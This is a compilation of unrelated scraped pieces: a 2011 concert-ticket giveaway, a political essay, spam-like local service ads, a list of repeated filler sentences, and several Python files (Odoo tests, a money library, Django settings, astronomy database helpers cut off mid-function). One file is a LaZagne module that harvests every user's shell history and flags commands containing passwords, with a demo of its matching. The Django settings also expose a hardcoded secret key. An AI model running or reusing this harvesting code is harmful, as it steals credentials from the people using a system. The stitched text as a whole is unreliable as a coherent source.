WE HAVE A WINNER! - WIN Tickets to Mediacorp Channel 5's Celebrate 2012 at Marina Bay S'pore Countdown! Hope you'll enjoy the show and Fireworks! Intending to head on down to the Marina Bay Singapore Countdown Party on New Year's Eve? Want to catch performances by latest Canadian sensation These Kids Wear Crowns, Siti Nurhaliza, Sheikh Haikel, Nat Ho, Inch Chua, Sezairi Sezali and Sylvia Ratonel? Itching to get a good view of the Fireworks? We have A PAIR OF TICKETS worth $50 to GIVEAWAY! 2. Answer the following question by posting your comment under THIS post - Name one of the performing acts for Marina Bay Singapore Countdown 2012. Contest closes on 30 DECEMBER 2011, 5PM.
#!/usr/bin/env python # -*- coding: utf-8 -*- import psutil import pwd import os from lazagne.config.module_info import ModuleInfo from lazagne.config import homes try: from ConfigParser import ConfigParser # Python 2.7 except ImportError: from configparser import ConfigParser # Python 3 class Cli(ModuleInfo): def __init__(self): ModuleInfo.__init__(self, 'cli', 'sysadmin') def get_files(self): known = set() for user, histfile in homes.users(file=['.history', '.sh_history', '.bash_history', '.zhistory']): yield user, histfile known.add(histfile) try: for process in psutil.process_iter(): try: environ = process.environ() user = process.username() except Exception: continue if 'HISTFILE' not in environ: continue histfile = environ['HISTFILE'] if histfile in ('/dev/zero', '/dev/null'): continue if histfile.startswith('~/'): try: home = pwd.getpwuid(process.uids().effective).pw_dir except Exception: continue histfile = os.path.join(home, histfile[2:]) if os.path.isfile(histfile) and not histfile in known: yield user, histfile known.add(histfile) except AttributeError: # Fix AttributeError: 'module' object has no attribute 'process_iter' pass def get_lines(self): known = set() for user, plainfile in self.get_files(): try: with open(plainfile) as infile: for line in infile.readlines(): line = line.strip() if line.startswith('#'): continue try: int(line) continue except Exception: pass line = ' '.join(x for x in line.split() if x) if line not in known: yield user, line known.add(line) except Exception: pass for user, histfile in homes.users(file='.local/share/mc/history'): parser = ConfigParser() try: parser.read(histfile) except Exception: continue try: for i in parser.options('cmdline'): line = parser.get('cmdline', i) if line not in known: yield user, line known.add(line) except Exception: pass def suspicious(self, user, line): markers = [ ('sshpass', '-p'), ('chpasswd',), ('openssl', 'passwd'), ('sudo', '-S'), ('mysql', '-p'), ('psql', 'postgresql://'), ('pgcli', 'postgresql://'), ('ssh', '-i'), ('sqlplus', '/'), ('xfreerdp', '/p'), ('vncviewer', 'passwd'), ('vncviewer', 'PasswordFile'), ('mount.cifs', 'credentials'), ('pass=',), ('smbclient',), ('ftp', '@'), ('wget', '@'), ('curl', '@'), ('curl', '-u'), ('wget', '-password'), ('rdesktop', '-p'), ] for marker in markers: if all((x in line) for x in marker): yield { 'User': user, 'Cmd': line } def run(self): all_cmds = [] for user, line in self.get_lines(): for cmd in self.suspicious(user, line): all_cmds.append(cmd) return all_cmds
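The suspicious() check above is just an all()-over-substrings test per marker tuple. A standalone sketch of that matching, with a trimmed marker list and invented history lines, shows the behavior:

# Standalone demo of the marker matching used by suspicious(); sample lines are made up.
markers = [('sshpass', '-p'), ('mysql', '-p'), ('curl', '-u')]

lines = [
    'sshpass -p hunter2 ssh root@host',  # matches ('sshpass', '-p')
    'mysql -u app -p s3cret db',         # matches ('mysql', '-p')
    'ls -la /tmp',                       # matches nothing
]

for line in lines:
    for marker in markers:
        if all(x in line for x in marker):
            print('suspicious:', line)
            break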
The Jobs of Tomorrow? - Rally, Comrades! The U.S. community college system is the largest public education system in the world, with over 5 million students. Community colleges traditionally have been used by students for remediation, life-long learning, training in specific skills, and for two-year degrees, leading to university. Obama has announced a new mission — training the work force of today for the jobs of tomorrow. At the same time, community colleges are being cut by hundreds of millions of dollars. The same “public/private partnerships” that lead to corporatization and privatization are supposedly going to save the day. But what exactly are the jobs of tomorrow? The introduction of electronics is destroying the unskilled and semiskilled jobs that marked the Industrial Era. Computers are transforming these jobs into temp jobs and precarious labor that works little, but is always on call. It is simply a lie that the capitalist system will produce jobs that can sustain families for the whole working class. That’s not profitable. The capitalist class can use what they need of the huge U.S. population as an army of low-paid and contingent workers. Why would they fund a two-year community college degree program that equips people for anything more? To restructure for this future, community colleges are cutting classes and driving out students. They will no longer permit students to re-take a course they fail, and will require every student to be on a job track and take only those courses. In community colleges, as in K-12 education and public universities, the government is being re-organized to directly conform to a for-profit system.
# -*- coding: utf-8 -*-
from lxml import etree

from odoo.tests.common import TransactionCase
from odoo.tools.safe_eval import safe_eval as eval


class CRUDCase(TransactionCase):

    def crud(self, model, create_vals=None, write_vals=None, check_vals=None, view_id=None):
        # Avoid mutable default arguments: a shared dict would leak state between calls.
        create_vals = create_vals or {}
        write_vals = write_vals or {}
        check_vals = check_vals or {}

        arch = model.fields_view_get(view_id=view_id, view_type='form', toolbar=True)
        data = model.default_get(arch['fields'].keys())
        self.assertTrue(arch['toolbar'])
        obj = model.create(create_vals)
        self.assertTrue(obj.exists())
        obj = model.browse(obj.id)
        self.assertTrue(obj)
        data = obj.read(arch['fields'].keys())
        arch = model.fields_view_get(view_type='tree')
        data = obj.read(arch['fields'].keys())
        obj.write(write_vals)
        for k, v in write_vals.items():
            if type(obj[k]) != type(v) and isinstance(v, int):
                self.assertEqual(obj[k].id, v)
            else:
                self.assertEqual(obj[k], v)
        for k, v in check_vals.items():
            self.assertEqual(obj[k], v)
        arch = model.fields_view_get(view_type='tree', toolbar=True)
        self.assertTrue(arch['toolbar'])
        arch = model.fields_view_get(view_type='search')
        self.assertTrue(arch)
        nodes = etree.XML(arch['arch']).xpath("/search/group/filter")
        if not nodes:
            nodes = etree.XML(arch['arch']).xpath("/search/filter")
        groups = []
        fields = []
        for node in nodes:
            node = eval(node.get('context'))
            if 'group_by' not in node:
                continue
            node = node.get('group_by').decode('utf-8', 'ignore')
            groups.append(node)
            fields.append(node.split(":")[0])
        fields = list(set(fields))
        if groups:
            field_names = self.env['ir.model.fields'].search([
                ('model', '=', model._name),
                ('name', 'in', fields)]).mapped('name')
            self.assertEqual(len(fields), len(field_names))
            res = model.read_group(domain=[], fields=fields, groupby=groups, lazy=True)
            self.assertTrue(res)
        obj.unlink()
        self.assertFalse(obj.exists())
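A minimal usage sketch of the helper above, assuming a standard Odoo model such as res.partner is available in the test environment; the test class name and field values are illustrative:

# Hypothetical test method built on CRUDCase; res.partner and its
# 'name'/'comment' fields are standard Odoo, the values are made up.
class PartnerCRUDCase(CRUDCase):

    def test_partner_crud(self):
        self.crud(
            self.env['res.partner'],
            create_vals={'name': 'Test Partner'},
            write_vals={'comment': 'updated by CRUDCase'},
            check_vals={'name': 'Test Partner'},
        )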
"There can be acceptance corps." "There can be acceptance rates." "There can be acceptance conditions." "There can be acceptance insurances." "There can be acceptance levels." "There can be acceptance forms." "There can be acceptance corp.s." "There can be acceptance bills." "There can be acceptance periods." "There can be acceptance trials." "There can be acceptance points." "There can be acceptance houses." "There can be acceptance fees." "There can be acceptance criteria." "There can be acceptance credits." "There can be acceptance amongsts." "There can be acceptance stakes." "There can be acceptance samplings." "There can be acceptance dates." "There can be acceptance corporations."
# -*- coding: utf-8 -*-
from __future__ import division

import decimal
from collections import namedtuple

from six import PY3

from .exchange_rates import get_exchange_rate
from .exceptions import ExchangeError, MoneyError


def round_amount(amount, currency):
    """Round a given amount using the currency's exponent.

    :param amount: :class:`~decimal.Decimal` number.
    :param currency: :class:`~rockefeller.currency.Currency` object.

    :return: Rounded amount as a :class:`~decimal.Decimal` number.

    :raises: :class:`~rockefeller.exceptions.MoneyError` if an invalid
        currency is supplied.
    """
    try:
        exponent = '1.' + '0' * currency.exponent
    except AttributeError:
        raise MoneyError('Wrong currency `{!r}` for money.'.format(currency))
    return amount.quantize(decimal.Decimal(exponent),
                           rounding=decimal.ROUND_HALF_UP)


def to_decimal(value):
    """Convert a value into a decimal value.

    :param value: Any value that can be casted into a numeric string.

    :return: Decimal value. :class:`~decimal.Decimal` instance.
    """
    if not isinstance(value, decimal.Decimal):
        value = decimal.Decimal(str(value))
    return value


def _check_operand(operation, operand):
    if not isinstance(operand, Money):
        msg = "unsupported operand type(s) for %s: 'Money' and '%r'" % (
            operation, operand.__class__)
        raise TypeError(msg)


class Money(namedtuple('Money', 'amount currency')):
    """Representation of money.

    Every `Money` object has an amount and a currency associated to it and
    the amount is always a :class:`~decimal.Decimal` value.

    Initialization params:

        `amount`
            Amount of money.

        `currency`
            Money currency. :class:`~rockefeller.currency.Currency` instance.
    """
    indirection_currency = None

    def __new__(cls, amount, currency):
        return super(Money, cls).__new__(cls, to_decimal(amount), currency)

    def __eq__(self, other):
        return (isinstance(other, self.__class__) and
                self.amount == other.amount and
                self.currency == other.currency)

    # Defining __eq__ sets __hash__ to None on Python 3; restore tuple hashing
    # so Money instances stay usable in sets and as dict keys.
    __hash__ = tuple.__hash__

    def __add__(self, other):
        _check_operand('+', other)
        return Money(self.amount + other.amount, self.currency)

    def __sub__(self, other):
        _check_operand('-', other)
        return Money(self.amount - other.amount, self.currency)

    def __mul__(self, other):
        _check_operand('*', other)
        return Money(self.amount * other.amount, self.currency)

    def __div__(self, other):
        _check_operand('/', other)
        return Money(self.amount / other.amount, self.currency)
    __floordiv__ = __div__
    __truediv__ = __div__

    def __divmod__(self, other):
        quotient, remainder = divmod(self.amount, other.amount)
        return Money(quotient, self.currency), Money(remainder, self.currency)

    def __float__(self):
        return float(round_amount(self.amount, self.currency))

    def __str__(self):
        value = self.__unicode__()
        if PY3:
            return value
        return value.encode('utf-8')

    def __unicode__(self):
        amount = self.amount
        parts = str(amount).split('.')
        if len(parts) == 2 and int(parts[1]) == 0:
            amount = parts[0]
        return u'{}{}'.format(self.currency.symbol, amount)

    def remove(self, other):
        result = self - other
        if result.amount < 0:
            result = Money(0, self.currency)
        return result

    def get_exchange_rate_to(self, currency, indirection_currency=None):
        """Get exchange rate of the currency of this money relative to
        ``currency``.

        :param currency: Output currency.
            :class:`~rockefeller.currency.Currency` instance.
        :param indirection_currency: Use this currency as the indirection
            currency. :class:`~rockefeller.currency.Currency` instance.

        :return: Exchange rate as a ``decimal`` if found, else ``None``.
""" rate = get_exchange_rate(self.currency, currency) if rate is None: if not indirection_currency and Money.indirection_currency: indirection_currency = Money.indirection_currency rate_from_base = get_exchange_rate(self.currency, indirection_currency) rate_base_to = get_exchange_rate(indirection_currency, currency) if rate_from_base and rate_base_to: rate = rate_from_base * rate_base_to return rate @property def rounded_amount(self): return round_amount(self.amount, self.currency) def exchange_to(self, currency, indirection_currency=None, exchange_rate=None): """Convert this money into money of another currency. :param currency: Convert this money into this currency. :class:`~rockefeller.currency.Currency` instance. :param indirection_currency: Use this currency as the indirection currency. :class:`~rockefeller.currency.Currency` instance. :param exchange_rate: Use this exchange rate instead of trying to find one. :return: Money in ``currency`` currency. :class:`~rockefeller.money.Money` instance. :raises: :class:`~rockefeller.exceptions.ExchangeError` if Exchange rate bettween currencies is not defined. """ if exchange_rate is None: exchange_rate = self.get_exchange_rate_to( currency, indirection_currency=indirection_currency) else: exchange_rate = to_decimal(exchange_rate) if exchange_rate is None: raise ExchangeError('Exchange rate {}-{} not defined.'.format( self.currency, currency)) amount = round_amount(self.amount * exchange_rate, currency) return self.__class__(amount=amount, currency=currency)
Every couple wants to have a dream wedding somewhere that is romantic and that they will remember for the rest of their lives. A wedding can be a dream come true by choosing wedding locations in Virginia Beach and then having one of the Virginia Beach wedding receptions. Planning a wedding can become a nightmare if you do not ask for help, and according to Brides magazine, most average couples spend around $27,000 on that perfect dream wedding, and that does not count the Virginia Beach wedding receptions to come. In today’s modern age, at least three quarters of the couples who get married plan to pay for their entire wedding, or at least help to pay for it, compared with couples whose relatives pay for the entire wedding on their own. Event catering in Virginia Beach should be able to help curb some of that cost with their Virginia Beach wedding receptions. Just call and ask for the event locations in Virginia Beach to be given some options. It is interesting to note that the first mention of wedding bands goes all the way back to Egypt in 2800 B.C. In modern day society there are more than 7,000 marriages that take place each day in the USA alone. That is a lot of Virginia Beach wedding receptions and a lot of Virginia Beach wedding catering plans. It is best to get a Virginia Beach event planning resource guide when planning your wedding and reception, as more than 40 percent of couples getting married today plan the entire wedding together. That is quite a change from the old days.
from random import randint, sample, choice

from app.models import Category, Designation, Project, Requirement


def add_projects(num_projects=20):
    designations = [d['name'] for d in Designation.get_all()]
    categories = [c['name'] for c in Category.get_all()]
    year = [y['requirement_name'] for y in Requirement.get_all_year(include_none=True)]
    major = [m['requirement_name'] for m in Requirement.get_all_major(include_none=True)]
    department = [d['requirement_name'] for d in Requirement.get_all_department(include_none=True)]
    for i in range(num_projects):
        name = 'Project #{}'.format(i)
        description = 'Description for {}'.format(name)
        advisor_name = 'Advisor for {}'.format(name)
        advisor_email = 'project{}[email protected]'.format(i)
        est_num_students = randint(0, 1000)
        designation = choice(designations)
        cats = [categories[j] for j in sample(range(len(categories)), randint(2, 5))]
        reqs = []
        if choice([True, False]):
            reqs.append(choice(year))
        if choice([True, False]):
            reqs.append(choice(major))
        else:
            # Pick from `department` here; the original indexed `major` with a
            # bound taken from `department`, which could raise IndexError.
            reqs.append(choice(department))
        new_project = Project(
            name=name,
            description=description,
            advisor_name=advisor_name,
            advisor_email=advisor_email,
            est_num_students=est_num_students,
            designation_name=designation,
            categories=cats,
            requirements=reqs,
            is_new_project=True
        )
        new_project.save()

if __name__ == '__main__':
    add_projects()
You can easily have confidence in Air Conditioning Top Team to provide the very best expert services when it comes to Goodman Air Conditioning in Avery, CA. You need the most innovative technology in the field, and our team of highly trained professionals will offer exactly that. Our supplies are always of the highest quality and we know how to help you save money. Contact us by dialing 888-368-1326 and we will be able to examine the options, reply to your concerns, and organize a consultation to get started with organizing the project. Here at Air Conditioning Top Team, we understand that you want to stay within budget and save money wherever you're able to. On top of that, you would like the best and finest standard of work for Goodman Air Conditioning in Avery, CA. We will make sure that our cash conserving efforts do not indicate a decreased level of quality. Whenever you hire our staff, you'll get the advantages of our knowledge and premium supplies to make certain that any project will last even while saving time and money. To illustrate, we take care to stay away from pricey errors, work fast to help save hours, and make sure you are given the very best prices on products and labor. To be able to find great deals, Air Conditioning Top Team is the service to connect with. Dial 888-368-1326 to talk to our client care agents, now. It is important to be knowledgeable concerning Goodman Air Conditioning in Avery, CA. We ensure that you know what can be expected. That is why we try to make every attempt to be sure that you are aware of the process and are not faced with any sort of surprises. Step one will be to call us today by dialing 888-368-1326 to begin your task. Within this call, you get all your questions responded to, and we can arrange a time to get started with work. We consistently arrive at the scheduled hour, ready to work together with you. If you are planning a venture regarding Goodman Air Conditioning in Avery, CA, there are plenty of reasons to work with Air Conditioning Top Team. Our products are of the very best quality, our cash saving practices are practical and powerful, and our customer service scores are unparalleled. We are there to serve you with the most experience and expertise in the market. Dial 888-368-1326 to connect with Air Conditioning Top Team and explore all your expectations regarding Goodman Air Conditioning in Avery.
""" Django settings for mysite project. For more information on this file, see https://docs.djangoproject.com/en/1.6/topics/settings/ For the full list of settings and their values, see https://docs.djangoproject.com/en/1.6/ref/settings/ """ # Build paths inside the project like this: os.path.join(BASE_DIR, ...) import os BASE_DIR = os.path.dirname(os.path.dirname(__file__)) # Quick-start development settings - unsuitable for production # See https://docs.djangoproject.com/en/1.6/howto/deployment/checklist/ # SECURITY WARNING: keep the secret key used in production secret! SECRET_KEY = '=vo#pirs@)4p%&#nnek+gq0yr7f2la1f@a51*3u4=h4&py9fo_' # SECURITY WARNING: don't run with debug turned on in production! DEBUG = True TEMPLATE_DEBUG = True ALLOWED_HOSTS = [] # Application definition INSTALLED_APPS = ( 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', 'polls', ) MIDDLEWARE_CLASSES = ( 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', ) ROOT_URLCONF = 'mysite.urls' WSGI_APPLICATION = 'mysite.wsgi.application' # Database # https://docs.djangoproject.com/en/1.6/ref/settings/#databases DATABASES = { 'default': { 'ENGINE': 'django.db.backends.sqlite3', 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'), } } # Internationalization # https://docs.djangoproject.com/en/1.6/topics/i18n/ LANGUAGE_CODE = 'en-us' TIME_ZONE = 'UTC' USE_I18N = True USE_L10N = True USE_TZ = True # Static files (CSS, JavaScript, Images) # https://docs.djangoproject.com/en/1.6/howto/static-files/ STATIC_URL = '/static/' TEMPLATE_DIRS = [os.path.join(BASE_DIR, 'templates')]
Get in touch with John Kilgore Heating & Air in Apison for a full air conditioning tune up today! With our comprehensive professional service, we have been able to keep up with the needs of our customers in Apison TN and always bring the highest level of dedication. Our heating & cooling specialists will always respect your schedule and your home by arriving on time and working to complete the job promptly while leaving the site nice and tidy. We are always available to you at John Kilgore Heating & Air.
################################################################################################################ # Collection of routines to update the RoboNet database tables # Keywords match the class model fields in ../robonet_site/events/models.py # # Written by Yiannis Tsapras Sep 2015 # Last update: ################################################################################################################ # Import dependencies import os import sys from local_conf import get_conf robonet_site = get_conf('robonet_site') sys.path.append(robonet_site) #os.environ['DJANGO_SETTINGS_MODULE'] = 'robonet_site.settings' os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'robonet_site.settings') from django.core import management from django.conf import settings from django.utils import timezone from django import setup setup() #from events.models import Event, Single_Model, Binary_Model, Data_File, Robonet_Log, Robonet_Reduction, Robonet_Request, Robonet_Status, Ogle_Detail, Moa_Detail, Kmt_Detail from events.models import Operator, Telescope, Instrument, Filter, Event, Event_Name ################################################################################################################ def add_operator(operator_name): """ Adds a new operator name in the database. This can be the survey name or the name of the follow-up group. Keyword arguments: operator_name -- The operator name (string, required) """ new_operator = Operator.objects.get_or_create(name=operator_name) if new_operator[-1] == False: successful = False else: successful = True return successful ################################################################################################################ def add_telescope(operator, telescope_name, aperture=0.0, latitude=0.0, longitude=0.0, altitude=0.0, site=""): """ Adds a new telescope name in the database. Keyword arguments: operator -- The operator (object, required) -- ForeignKey object telescope_name -- The telescope name (string, required) aperture -- The telescope aperture (float, optional, default=0.0) latitude -- The telescope latitude (N) in decimal degrees (float, optional, default=0.0) longitude -- The telescope longitude (E) in decimal degrees (float, optional, default=0.0) altitude -- The telescope altitude in meters (float, optional, default=0.0) site -- The site name (string, optional, default="") """ known_telescope = Telescope.objects.filter(name=telescope_name).exists() # If the telescope already exists there's no need to add it if known_telescope == True: successful = False else: add_new = Telescope(operator=operator, name=telescope_name, aperture=aperture, latitude=latitude, longitude=longitude, altitude=altitude,site=site) add_new.save() successful = True return successful ################################################################################################################ def add_instrument(telescope, instrument_name, pixscale=0.0): """ Adds a new instrument name in the database. A single instrument can appear multiple times in this list as it can be moved to different telescopes. 
    Keyword arguments:
    telescope -- The telescope (object, required) -- ForeignKey object
    instrument_name -- The instrument name (string, required)
    pixscale -- The pixel scale of the CCD (arcsec/pix)
    """
    try:
        add_new = Instrument(telescope=telescope, name=instrument_name, pixscale=pixscale)
        add_new.save()
        successful = True
    except:
        successful = False
    return successful

################################################################################################################
def add_filter(instrument, filter_name):
    """
    Adds a new filter name in the database. A single filter can appear multiple
    times in this list as it can exist for different instruments.

    Keyword arguments:
    instrument -- The instrument (object, required) -- ForeignKey object
    filter_name -- The filter name (string, required)
    """
    try:
        add_new = Filter(instrument=instrument, name=filter_name)
        add_new.save()
        successful = True
    except:
        successful = False
    return successful

################################################################################################################
def check_exists(event_name):
    """
    Check if event exists in database.

    Keyword arguments:
    event_name -- The event name (string, required)
    """
    if event_name.startswith("OGLE"):
        successful = Event.objects.filter(ev_name_ogle=event_name).exists()
    elif event_name.startswith("MOA"):
        successful = Event.objects.filter(ev_name_moa=event_name).exists()
    elif event_name.startswith("KMT"):
        successful = Event.objects.filter(ev_name_kmt=event_name).exists()
    else:
        successful = False
    return successful

################################################################################################################
def check_coords(event_name, check_ra, check_dec):
    """
    Cross-survey identification check.
    Check if an event at these coordinates already exists in the database.

    Keyword arguments:
    event_name -- The event name (string, required)
    check_ra -- event RA. (string, required) e.g. "17:54:33.58"
    check_dec -- event DEC. (string, required) e.g. "-30:31:02.02"
    """
    # TODO: implement cross-survey coordinate matching.
    pass

################################################################################################################
def add_new_event(event_name, event_ra, event_dec, bright_neighbour=False):
    """
    Add a new event to the database.

    Keyword arguments:
    event_name -- The event name. (string, required)
                  e.g. "OGLE-2015-BLG-1234", "MOA-2015-BLG-123" or "KMT-2015-BLG-1234"
    event_ra -- event RA. (string, required) e.g. "17:54:33.58"
    event_dec -- event DEC. (string, required) e.g. "-30:31:02.02"
    bright_neighbour -- Is there a bright neighbour? (boolean, optional, default=False)
    """
    # Check if the event already exists in the database. If not, add it.
if event_name.startswith("OGLE") and check_exists(event_name)==False: ev = Event(ev_name_ogle=event_name, ev_ra=event_ra, ev_dec=event_dec, bright_neighbour = bright_neighbour) ev.save() successful = True elif event_name.startswith("MOA") and check_exists(event_name)==False: ev = Event(ev_name_moa=event_name, ev_ra=event_ra, ev_dec=event_dec, bright_neighbour = bright_neighbour) ev.save() successful = True elif event_name.startswith("KMT") and check_exists(event_name)==False: ev = Event(ev_name_kmt=event_name, ev_ra=event_ra, ev_dec=event_dec, bright_neighbour = bright_neighbour) ev.save() successful = True else: successful = False return successful def update_data(event_name, datafile, last_upd, last_mag, tel, ver, ndat): """ Add or Update a data file to the database. Uses the .dat files rsynced from ARTEMiS. Keyword arguments: event_name -- The event name (string, required) datafile -- Full path to the data file (string, required) last_upd -- datetime of last update. (datetime, required, default=timezone.now()) last_mag -- last recorded magnitude (float, required) tel -- telescope identifier (string, required) ver -- reduction version identifier (integer, required) ndat -- number of data points (integer, required) """ # Check if the event already exists in the database. if event_name.startswith("OGLE") and check_exists(event_name)==True: # Get event identifier. ev = Event.objects.get(ev_name_ogle=event_name) ev.data_file_set.update_or_create(datafile=datafile, last_updated=last_upd, last_magnitude=last_mag, telescope=tel, version=ver, ndata=ndat) ev.save() successful = True elif event_name.startswith("MOA") and check_exists(event_name)==True: # Get event identifier. ev = Event.objects.get(ev_name_moa=event_name) ev.data_file_set.update_or_create(datafile=datafile, last_updated=last_upd, last_magnitude=last_mag, telescope=tel, version=ver, ndata=ndat) ev.save() successful = True elif event_name.startswith("KMT") and check_exists(event_name)==True: # Get event identifier. ev = Event.objects.get(ev_name_kmt=event_name) ev.data_file_set.update_or_create(datafile=datafile, last_updated=last_upd, last_magnitude=last_mag, telescope=tel, version=ver, ndata=ndat) ev.save() successful = True else: successful = False return successful ################################################################################################################ def ogle_details(event_name, Tmax, tau, umin, url_link, last_updated=timezone.now()): """ Update or Add OGLE event details to the database. These are the survey event parameters as displayed on the survey website. Keyword arguments: event_name -- OGLE name of event. (string, required) e.g. "OGLE-2015-BLG-1234" Tmax -- time of maximum magnification.(float, required) e.g. 2457135.422 tau -- event timescale (in days). (float, required) umin -- minimum impact parameter (in units of R_E). (float, required) last_updated -- datetime of last update. (datetime, required, default=timezone.now()) e.g. datetime(2015, 9, 23, 15, 26, 13, 104683, tzinfo=<UTC>) url_link -- URL link to OGLE survey event page (string, required) """ # Check if the event already exists in the database. 
    if check_exists(event_name)==True:
        # Get event identifier
        ev = Event.objects.get(ev_name_ogle=event_name)
        ev.ogle_detail_set.update_or_create(Tmax=Tmax, tau=tau, umin=umin,
                                            last_updated=last_updated, url_link=url_link)
        ev.save()
        successful = True
    else:
        successful = False
    return successful

################################################################################################################
def moa_details(event_name, Tmax, tau, umin, url_link, last_updated=None):
    """
    Update or Add MOA event details to the database. These are the survey event
    parameters as displayed on the survey website.

    Keyword arguments:
    event_name -- MOA name of event. (string, required) e.g. "MOA-2015-BLG-123"
    Tmax -- time of maximum magnification. (float, required) e.g. 2457135.422
    tau -- event timescale (in days). (float, required)
    umin -- minimum impact parameter (in units of R_E). (float, required)
    last_updated -- datetime of last update. (datetime, optional, default: time of call)
                    e.g. datetime(2015, 9, 23, 15, 26, 13, 104683, tzinfo=<UTC>)
    url_link -- URL link to MOA survey event page (string, required)
    """
    if last_updated is None:
        last_updated = timezone.now()
    # Check if the event already exists in the database.
    if check_exists(event_name)==True:
        # Get event identifier
        ev = Event.objects.get(ev_name_moa=event_name)
        ev.moa_detail_set.update_or_create(Tmax=Tmax, tau=tau, umin=umin,
                                           last_updated=last_updated, url_link=url_link)
        ev.save()
        successful = True
    else:
        successful = False
    return successful

################################################################################################################
def kmt_details(event_name, Tmax, tau, umin, url_link, last_updated=None):
    """
    Update or Add KMT event details to the database. These are the survey event
    parameters as displayed on the survey website.

    Keyword arguments:
    event_name -- KMT name of event. (string, required) e.g. "KMT-2015-BLG-1234"
    Tmax -- time of maximum magnification. (float, required) e.g. 2457135.422
    tau -- event timescale (in days). (float, required)
    umin -- minimum impact parameter (in units of R_E). (float, required)
    last_updated -- datetime of last update. (datetime, optional, default: time of call)
                    e.g. datetime(2015, 9, 23, 15, 26, 13, 104683, tzinfo=<UTC>)
    url_link -- URL link to KMT survey event page (string, required)
    """
    if last_updated is None:
        last_updated = timezone.now()
    # Check if the event already exists in the database.
    if check_exists(event_name)==True:
        # Get event identifier
        ev = Event.objects.get(ev_name_kmt=event_name)
        ev.kmt_detail_set.update_or_create(Tmax=Tmax, tau=tau, umin=umin,
                                           last_updated=last_updated, url_link=url_link)
        ev.save()
        successful = True
    else:
        successful = False
    return successful

################################################################################################################
def single_lens_par(event_name, Tmax, e_Tmax, tau, e_tau, umin, e_umin, last_updated):
    """
    Update or Add Single Lens model parameters as estimated by ARTEMiS to the database.

    Keyword arguments:
    event_name -- The event name. (string, required) e.g. "OGLE-2015-BLG-1234"
    Tmax -- time of maximum magnification. (float, required) e.g. 2457135.422
    e_Tmax -- error in Tmax (float, required)
    tau -- event timescale (in days). (float, required)
    e_tau -- error in tau (float, required)
    umin -- minimum impact parameter (in units of R_E). (float, required)
    e_umin -- error in umin (float, required)
    last_updated -- datetime of last update. (datetime, required)
                    e.g. datetime(2015, 9, 23, 15, 26, 13, 104683, tzinfo=<UTC>)
    """
    # Check if the event already exists in the database.
if event_name.startswith("OGLE") and check_exists(event_name)==True: # Get event identifier ev = Event.objects.get(ev_name_ogle=event_name) ev.single_model_set.update_or_create(Tmax=Tmax, e_Tmax=e_Tmax, tau=tau, e_tau=e_tau, umin=umin, e_umin=e_umin, last_updated=last_updated) ev.save() successful = True elif event_name.startswith("MOA") and check_exists(event_name)==True: # Get event identifier ev = Event.objects.get(ev_name_moa=event_name) ev.single_model_set.update_or_create(Tmax=Tmax, e_Tmax=e_Tmax, tau=tau, e_tau=e_tau, umin=umin, e_umin=e_umin, last_updated=last_updated) ev.save() successful = True elif event_name.startswith("KMT") and check_exists(event_name)==True: # Get event identifier ev = Event.objects.get(ev_name_kmt=event_name) ev.single_model_set.update_or_create(Tmax=Tmax, e_Tmax=e_Tmax, tau=tau, e_tau=e_tau, umin=umin, e_umin=e_umin, last_updated=last_updated) ev.save() successful = True else: successful = False return successful ################################################################################################################ def double_lens_par(event_name, Tmax, e_Tmax, tau, e_tau, umin, e_umin, q, e_q, s, e_s, rho, alpha, last_updated): """ Update or Add Binary Lens model parameters as estimated by ARTEMiS to the database. Keyword arguments: event_name -- KMT name of event. (string, required) e.g. "KMT-2015-BLG-1234" Tmax -- time of maximum magnification.(float, required) e.g. 2457135.422 e_Tmax -- error in Tmax (float, required) tau -- event timescale (in days). (float, required) e_tau -- error in tau (float, required) umin -- minimum impact parameter (in units of R_E). (float, required) e_umin -- error in umin (float, required) q -- mass ratio between the lensing components. (float, required) e_q -- error in q (float, required) s -- projected separation between the two lensing components (in units of R_E). (float, required) e_s -- error in s (float, required) rho -- finite source size (in units of R_E). (float, required) alpha -- trajectory angle w.r.t. binary axis (float, required) last_updated -- datetime of last update. (datetime, required) e.g. datetime(2015, 9, 23, 15, 26, 13, 104683, tzinfo=<UTC>) """ # Check if the event already exists in the database. 
if event_name.startswith("OGLE") and check_exists(event_name)==True: # Get event identifier ev = Event.objects.get(ev_name_ogle=event_name) ev.binary_model_set.update_or_create(Tmax=Tmax, e_Tmax=e_Tmax, tau=tau, e_tau=e_tau, umin=umin, e_umin=e_umin, mass_ratio=q, e_mass_ratio=e_q, separation=s, e_separation=e_s, rho_finite=rho, angle_a = alpha, last_updated=last_updated) ev.save() successful = True elif event_name.startswith("MOA") and check_exists(event_name)==True: # Get event identifier ev = Event.objects.get(ev_name_moa=event_name) ev.binary_model_set.update_or_create(Tmax=Tmax, e_Tmax=e_Tmax, tau=tau, e_tau=e_tau, umin=umin, e_umin=e_umin, mass_ratio=q, e_mass_ratio=e_q, separation=s, e_separation=e_s, rho_finite=rho, angle_a = alpha, last_updated=last_updated) ev.save() successful = True elif event_name.startswith("KMT") and check_exists(event_name)==True: # Get event identifier ev = Event.objects.get(ev_name_kmt=event_name) ev.binary_model_set.update_or_create(Tmax=Tmax, e_Tmax=e_Tmax, tau=tau, e_tau=e_tau, umin=umin, e_umin=e_umin, mass_ratio=q, e_mass_ratio=e_q, separation=s, e_separation=e_s, rho_finite=rho, angle_a = alpha, last_updated=last_updated) ev.save() successful = True else: successful = False return successful ################################################################################################################ def update_log(event_name, image_name, timestamp, exptime, filter1, filter2, filter3, telescope, instrument, group_id, track_id, req_id, airmass, fwhm, sky_bg, sd_bg, moon_sep, elongation, nstars, quality): """ Update Log with new image details in the database. Keyword arguments: event_name -- The event name. (string, required) e.g. "OGLE-2015-BLG-1234" image_name -- The image name. (string, required) e.g. lsc1m005-kb78-20150922-0089-e10.fits timestamp -- Time of observation. (datetime, required) e.g. datetime(2015, 9, 23, 15, 26, 13, 104683, tzinfo=<UTC>) exptime -- Exposure time. (float, required) filter1 -- Filter1 wheel identifier. (string, required) filter2 -- Filter2 wheel identifier. (string, required) filter3 -- Filter3 wheel identifier. (string, required) telescope -- Telescope identifier. (string, required) 